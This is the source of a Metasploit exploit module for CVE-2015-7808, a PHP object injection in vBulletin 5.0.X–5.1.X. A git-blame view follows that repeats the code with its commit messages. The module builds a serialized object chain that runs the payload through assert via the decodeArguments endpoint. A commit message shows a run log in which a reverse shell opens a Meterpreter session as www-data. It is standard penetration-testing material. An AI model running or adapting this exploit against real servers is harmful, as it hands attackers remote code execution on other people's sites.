metasploit-framework/modules/exploits/multi/http/vbulletin_unserialize.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'vBulletin 5.1.2 Unserialize Code Execution',
      'Description'    => %q{
        This module exploits a PHP object injection vulnerability in vBulletin 5.1.2 to 5.1.9
      },
      'Platform'       => 'php',
      'License'        => MSF_LICENSE,
      'Author'         => [
          'Netanel Rubin',  # reported by
          'cutz',  # original exploit
          'Julien (jvoisin) Voisin',  # metasploit module
      ],
      'Payload'        =>
        {
          'BadChars'    => "\x22",
        },
      'References'     =>
        [
          ['CVE', '2015-7808'],
          ['EDB', '38629'],
          ['URL', 'http://pastie.org/pastes/10527766/text?key=wq1hgkcj4afb9ipqzllsq'],
          ['URL', 'http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/']
        ],
      'Arch'           => ARCH_PHP,
      'Targets'        => [
          [ 'Automatic Targeting', { 'auto' => true }  ],
          ['vBulletin 5.0.X', {'chain' => 'vB_Database'}],
          ['vBulletin 5.1.X', {'chain' => 'vB_Database_MySQLi'}],
      ],
      'DisclosureDate' => 'Nov 4 2015',
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('TARGETURI', [ true, "The base path to the web application", "/"])
        ], self.class)
  end

  def check
      begin
          res = send_request_cgi({ 'uri' => target_uri.path })
          if (res && res.body.include?('vBulletin Solutions, Inc.'))
              if res.body.include?("Version 5.0")
                  @my_target = targets[1] if target['auto']
                  return Exploit::CheckCode::Appears
              elsif res.body.include?("Version 5.1")
                  @my_target = targets[2] if target['auto']
                  return Exploit::CheckCode::Appears
              else
                  return Exploit::CheckCode::Detected
              end
          end
      rescue ::Rex::ConnectionError
          return Exploit::CheckCode::Safe
      end
  end

  def exploit
    print_status("Trying to inferprint the instance...")

    @my_target = target
    check_code = check

    unless check_code == Exploit::CheckCode::Detected || check_code == Exploit::CheckCode::Appears
      fail_with(Failure::NoTarget, "#{peer} - Failed to detect a vulnerable instance")
    end

    if @my_target.nil? || @my_target['auto']
      fail_with(Failure::NoTarget, "#{peer} - Failed to auto detect, try setting a manual target...")
    end

    print_status("Exploiting #{@my_target.name}...")

    chain = 'O:12:"vB_dB_Result":2:{s:5:"*db";O:'
    chain << @my_target["chain"].length.to_s
    chain << ':"'
    chain << @my_target["chain"]
    chain << '":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"assert";}}s:12:"*recordset";s:'
    chain << "#{payload.encoded.length}:\"#{payload.encoded}\";}"

    chain = Rex::Text.uri_encode(chain)
    chain = chain.gsub(/%2a/, '%00%2a%00')  # php and Rex disagree on '*' encoding

    send_request_cgi({
        'method' => 'GET',
        'uri'       => normalize_uri(target_uri.path, 'ajax/api/hook/decodeArguments'),
        'vars_get' => {
            'arguments' => chain
      },
       'encode_params' => false,
    })
  end
end
Implement a module for the recent vBulletin RCE This module implements the recent unserialize-powered RCE against vBulletin 5.1.X Step to reproduce: 1. Install vBulletin 5.1.X 2. Launch the exploit against it ``` msf exploit(vbulletin_unserialize) > check [] 192.168.1.25:80 - The target appears to be vulnerable. msf exploit(vbulletin_unserialize) > ``` ``` msf exploit(vbulletin) > run [] Started reverse handler on 192.168.1.11:4444 [] Sending stage (33068 bytes) to 192.168.1.25 [] Meterpreter session 1 opened (192.168.1.11:4444 -> 192.168.1.25:49642) at 2015-11-06 14:04:46 +0100 meterpreter > getuid Server username: www-data (33) ``` 2015-11-06 13:59:25 +00:00			`##`
			`# This module requires Metasploit: http://metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Exploit::Remote`
			`Rank = ExcellentRanking`

			`include Msf::Exploit::Remote::HttpClient`

			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'vBulletin 5.1.2 Unserialize Code Execution',`
			`'Description' => %q{`
			`This module exploits a PHP object injection vulnerability in vBulletin 5.1.2 to 5.1.9`
			`},`
			`'Platform' => 'php',`
			`'License' => MSF_LICENSE,`
			`'Author' => [`
			`'Netanel Rubin', # reported by`
			`'cutz', # original exploit`
			`'Julien (jvoisin) Voisin', # metasploit module`
			`],`
The double-quote character is a badchar 2015-11-06 15:43:53 +00:00			`'Payload' =>`
			`{`
			`'BadChars' => "\x22",`
			`},`
Implement a module for the recent vBulletin RCE This module implements the recent unserialize-powered RCE against vBulletin 5.1.X Step to reproduce: 1. Install vBulletin 5.1.X 2. Launch the exploit against it ``` msf exploit(vbulletin_unserialize) > check [] 192.168.1.25:80 - The target appears to be vulnerable. msf exploit(vbulletin_unserialize) > ``` ``` msf exploit(vbulletin) > run [] Started reverse handler on 192.168.1.11:4444 [] Sending stage (33068 bytes) to 192.168.1.25 [] Meterpreter session 1 opened (192.168.1.11:4444 -> 192.168.1.25:49642) at 2015-11-06 14:04:46 +0100 meterpreter > getuid Server username: www-data (33) ``` 2015-11-06 13:59:25 +00:00			`'References' =>`
			`[`
			`['CVE', '2015-7808'],`
Add the EDB id 2015-11-06 16:06:03 +00:00			`['EDB', '38629'],`
Implement a module for the recent vBulletin RCE This module implements the recent unserialize-powered RCE against vBulletin 5.1.X Step to reproduce: 1. Install vBulletin 5.1.X 2. Launch the exploit against it ``` msf exploit(vbulletin_unserialize) > check [] 192.168.1.25:80 - The target appears to be vulnerable. msf exploit(vbulletin_unserialize) > ``` ``` msf exploit(vbulletin) > run [] Started reverse handler on 192.168.1.11:4444 [] Sending stage (33068 bytes) to 192.168.1.25 [] Meterpreter session 1 opened (192.168.1.11:4444 -> 192.168.1.25:49642) at 2015-11-06 14:04:46 +0100 meterpreter > getuid Server username: www-data (33) ``` 2015-11-06 13:59:25 +00:00			`['URL', 'http://pastie.org/pastes/10527766/text?key=wq1hgkcj4afb9ipqzllsq'],`
			`['URL', 'http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/']`
			`],`
			`'Arch' => ARCH_PHP,`
The modules now works on 5.1.X and 5.0.X - Added automatic targeting - Added support for 5.0.X 2015-11-07 13:26:04 +00:00			`'Targets' => [`
			`[ 'Automatic Targeting', { 'auto' => true } ],`
			`['vBulletin 5.0.X', {'chain' => 'vB_Database'}],`
			`['vBulletin 5.1.X', {'chain' => 'vB_Database_MySQLi'}],`
			`],`
Implement a module for the recent vBulletin RCE This module implements the recent unserialize-powered RCE against vBulletin 5.1.X Step to reproduce: 1. Install vBulletin 5.1.X 2. Launch the exploit against it ``` msf exploit(vbulletin_unserialize) > check [] 192.168.1.25:80 - The target appears to be vulnerable. msf exploit(vbulletin_unserialize) > ``` ``` msf exploit(vbulletin) > run [] Started reverse handler on 192.168.1.11:4444 [] Sending stage (33068 bytes) to 192.168.1.25 [] Meterpreter session 1 opened (192.168.1.11:4444 -> 192.168.1.25:49642) at 2015-11-06 14:04:46 +0100 meterpreter > getuid Server username: www-data (33) ``` 2015-11-06 13:59:25 +00:00			`'DisclosureDate' => 'Nov 4 2015',`
			`'DefaultTarget' => 0))`
Add the possibility to target non-default path 2015-11-06 14:33:30 +00:00
			`register_options(`
			`[`
			`OptString.new('TARGETURI', [ true, "The base path to the web application", "/"])`
			`], self.class)`
Implement a module for the recent vBulletin RCE This module implements the recent unserialize-powered RCE against vBulletin 5.1.X Step to reproduce: 1. Install vBulletin 5.1.X 2. Launch the exploit against it ``` msf exploit(vbulletin_unserialize) > check [] 192.168.1.25:80 - The target appears to be vulnerable. msf exploit(vbulletin_unserialize) > ``` ``` msf exploit(vbulletin) > run [] Started reverse handler on 192.168.1.11:4444 [] Sending stage (33068 bytes) to 192.168.1.25 [] Meterpreter session 1 opened (192.168.1.11:4444 -> 192.168.1.25:49642) at 2015-11-06 14:04:46 +0100 meterpreter > getuid Server username: www-data (33) ``` 2015-11-06 13:59:25 +00:00			`end`

			`def check`
The modules now works on 5.1.X and 5.0.X - Added automatic targeting - Added support for 5.0.X 2015-11-07 13:26:04 +00:00			`begin`
			`res = send_request_cgi({ 'uri' => target_uri.path })`
			`if (res && res.body.include?('vBulletin Solutions, Inc.'))`
			`if res.body.include?("Version 5.0")`
			`@my_target = targets[1] if target['auto']`
			`return Exploit::CheckCode::Appears`
			`elsif res.body.include?("Version 5.1")`
			`@my_target = targets[2] if target['auto']`
			`return Exploit::CheckCode::Appears`
			`else`
			`return Exploit::CheckCode::Detected`
			`end`
			`end`
			`rescue ::Rex::ConnectionError`
			`return Exploit::CheckCode::Safe`
			`end`
Implement a module for the recent vBulletin RCE This module implements the recent unserialize-powered RCE against vBulletin 5.1.X Step to reproduce: 1. Install vBulletin 5.1.X 2. Launch the exploit against it ``` msf exploit(vbulletin_unserialize) > check [] 192.168.1.25:80 - The target appears to be vulnerable. msf exploit(vbulletin_unserialize) > ``` ``` msf exploit(vbulletin) > run [] Started reverse handler on 192.168.1.11:4444 [] Sending stage (33068 bytes) to 192.168.1.25 [] Meterpreter session 1 opened (192.168.1.11:4444 -> 192.168.1.25:49642) at 2015-11-06 14:04:46 +0100 meterpreter > getuid Server username: www-data (33) ``` 2015-11-06 13:59:25 +00:00			`end`

			`def exploit`
Remove now-redundant peer These all include either Msf::Exploit::Remote:Tcp or Msf::Exploit::Remote:HttpClient 2016-02-01 21:12:03 +00:00			`print_status("Trying to inferprint the instance...")`
The modules now works on 5.1.X and 5.0.X - Added automatic targeting - Added support for 5.0.X 2015-11-07 13:26:04 +00:00
			`@my_target = target`
			`check_code = check`

			`unless check_code == Exploit::CheckCode::Detected \|\| check_code == Exploit::CheckCode::Appears`
			`fail_with(Failure::NoTarget, "#{peer} - Failed to detect a vulnerable instance")`
			`end`

			`if @my_target.nil? \|\| @my_target['auto']`
			`fail_with(Failure::NoTarget, "#{peer} - Failed to auto detect, try setting a manual target...")`
			`end`

Remove now-redundant peer These all include either Msf::Exploit::Remote:Tcp or Msf::Exploit::Remote:HttpClient 2016-02-01 21:12:03 +00:00			`print_status("Exploiting #{@my_target.name}...")`
Implement a module for the recent vBulletin RCE This module implements the recent unserialize-powered RCE against vBulletin 5.1.X Step to reproduce: 1. Install vBulletin 5.1.X 2. Launch the exploit against it ``` msf exploit(vbulletin_unserialize) > check [] 192.168.1.25:80 - The target appears to be vulnerable. msf exploit(vbulletin_unserialize) > ``` ``` msf exploit(vbulletin) > run [] Started reverse handler on 192.168.1.11:4444 [] Sending stage (33068 bytes) to 192.168.1.25 [] Meterpreter session 1 opened (192.168.1.11:4444 -> 192.168.1.25:49642) at 2015-11-06 14:04:46 +0100 meterpreter > getuid Server username: www-data (33) ``` 2015-11-06 13:59:25 +00:00
The modules now works on 5.1.X and 5.0.X - Added automatic targeting - Added support for 5.0.X 2015-11-07 13:26:04 +00:00			`chain = 'O:12:"vB_dB_Result":2:{s:5:"*db";O:'`
			`chain << @my_target["chain"].length.to_s`
			`chain << ':"'`
			`chain << @my_target["chain"]`
			`chain << '":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"assert";}}s:12:"*recordset";s:'`
Implement a module for the recent vBulletin RCE This module implements the recent unserialize-powered RCE against vBulletin 5.1.X Step to reproduce: 1. Install vBulletin 5.1.X 2. Launch the exploit against it ``` msf exploit(vbulletin_unserialize) > check [] 192.168.1.25:80 - The target appears to be vulnerable. msf exploit(vbulletin_unserialize) > ``` ``` msf exploit(vbulletin) > run [] Started reverse handler on 192.168.1.11:4444 [] Sending stage (33068 bytes) to 192.168.1.25 [] Meterpreter session 1 opened (192.168.1.11:4444 -> 192.168.1.25:49642) at 2015-11-06 14:04:46 +0100 meterpreter > getuid Server username: www-data (33) ``` 2015-11-06 13:59:25 +00:00			`chain << "#{payload.encoded.length}:\"#{payload.encoded}\";}"`

			`chain = Rex::Text.uri_encode(chain)`
			`chain = chain.gsub(/%2a/, '%00%2a%00') # php and Rex disagree on '*' encoding`

rm res var name the res variable isn't used 2015-11-12 20:37:47 +00:00			`send_request_cgi({`
Implement a module for the recent vBulletin RCE This module implements the recent unserialize-powered RCE against vBulletin 5.1.X Step to reproduce: 1. Install vBulletin 5.1.X 2. Launch the exploit against it ``` msf exploit(vbulletin_unserialize) > check [] 192.168.1.25:80 - The target appears to be vulnerable. msf exploit(vbulletin_unserialize) > ``` ``` msf exploit(vbulletin) > run [] Started reverse handler on 192.168.1.11:4444 [] Sending stage (33068 bytes) to 192.168.1.25 [] Meterpreter session 1 opened (192.168.1.11:4444 -> 192.168.1.25:49642) at 2015-11-06 14:04:46 +0100 meterpreter > getuid Server username: www-data (33) ``` 2015-11-06 13:59:25 +00:00			`'method' => 'GET',`
			`'uri' => normalize_uri(target_uri.path, 'ajax/api/hook/decodeArguments'),`
			`'vars_get' => {`
			`'arguments' => chain`
			`},`
			`'encode_params' => false,`
			`})`
			`end`
			`end`